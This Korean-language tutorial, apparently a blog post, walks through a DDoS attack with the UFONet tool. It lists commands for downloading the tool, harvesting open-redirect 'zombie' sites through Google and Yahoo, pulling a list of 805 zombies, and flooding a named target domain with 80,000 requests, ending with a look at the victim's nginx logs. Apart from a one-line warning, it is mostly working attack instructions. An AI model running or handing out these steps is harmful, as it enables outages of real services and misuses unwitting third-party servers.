ufonet 봇넷을 이용한 DDoS 공격

개요

1. 주의사항

2. ufonet 정의

3. 환경구축

4. 툴 사용 및 공격

5. 공격 결과

 

[주의사항]

실제 서비스되는 사이트에 절대절대 공격하면 안됨(로그 다남습니다).

파이썬으로 동작하는 툴이기에 파이썬이 선수조건으로 설치 되어있어야함.

 

PC 다운로드 경로

https://sourceforge.net/projects/ufonet/

ufonet이란?

1. 좀비 PC 리스트를 자체적으로 가지고 있고, 인터넷상에서 좀비 PC들을 찾은 후 해당 좀비 PC들을 이용하여 공격 타겟을 정한 후 DDoS 공격을 시작 하는 공격 툴입니다. ufonet는 Open Redirect를 사용하여 Layer 7 (APP / HTTP) DDoS 공격 을 시작하도록 설계되었습니다.

또한 오픈소스이기 때문에 자신이 코드분석을 하며 더 자세히 볼 수 있습니다. default 쓰레드값이 5로 설정되어있으며 공격시에 본인이 지정해주면 될 것 같습니다.

DDoS란?

분산서비스거부공격으로 공격자가 특정 사이트에 접속하여 과도한 트래픽을 일으켜 서비스를 방해하는 즉 서버의 가용성을 해치는 공격입니다.

 

봇넷이란?

좀비PC로 이루어진 네트워크이며 C&C 서버와 통신하며 공격자의 명령을 기다리고 있는 PC들입니다.

 

[공격자 서버](Kali linux)

1. ufonet 툴 패키지 다운로드 :

wget https://ufonet.03c8.net/ufonet/ufonet-v1.6.zip

2. 다운받은 툴 압축 해제

unzip -x ufonet-v1.6.zip

3. 압축 해제한 디렉토리로 이동

cd /ufonet

4. 서치엔진을 이용하여 좀비PC를 찾기(구글)

python3 ./ufonet -s 'proxy.php?url=' --se 'google'

구글에서는 좀비pc는 살아있지않음.

5. 서치엔진을 이용하여 좀비PC를 찾기(야후)

python3 ./ufonet -s 'proxy.php?url=' --se 'yahoo'

야후에서는 좀비pc는 2대의 살아있지만 페이로드가 가능한 것은 없는것을 Fail을 통해 확인

6. 툴에 내제되어있는 좀비PC 다운로드

python3 ./ufonet --download-zombie

805개의 좀비PC가 다운로드 후 zombie.txt 내역

7. 타겟 사이트를 Inspection(검사)하기

python3 ./ufonet -i http://www.wafbot.com

8. 서치엔진에서 찾은 좀비PC의 목록을 zobies.txt파일에 추가(생략가능) 서치엔진을 이용하는 중 새로운 좀비의 추가 여부를 묻기 때문에.

vi /ufonet/botnet/zombies.txt

9. 좀비PC들이 있는 zombies.txt 파일을 이용하여 -a 명령어 뒤에 타겟팅 주소를 입력을 하면 공격 성공

python3 ./ufonet -t 'botnet/zombies.txt' -a 

http://www.wafbot.com

또는 python3 ./ufonet -a http://www.wafbot.com -r 100 --threads 500

800개 좀비 x 800라운드 = 요청 80,000개

10. [피해자 서버](CentOS)

공격시에 실시간으로 피해자의 서버 웹로그에 다량으로 로그가 발생하게 됩니다.

tail -f /var/log/nginx/access.log 명령어로 실시간 로그 확인하여

로그를 추출 특징적인 로그가 있는지 확인합니다.

우리가 아는 봇과 이름과는 조금 틀리게 나와있다.

레퍼런스

https://github.com/epsylon/ufonet

epsylon/ufonet

https://ufonet.03c8.net/FAQ.html

UFONet - Denial of Service Toolkit

https://ufonet.03c8.net/

UFONet - Denial of Service Toolkit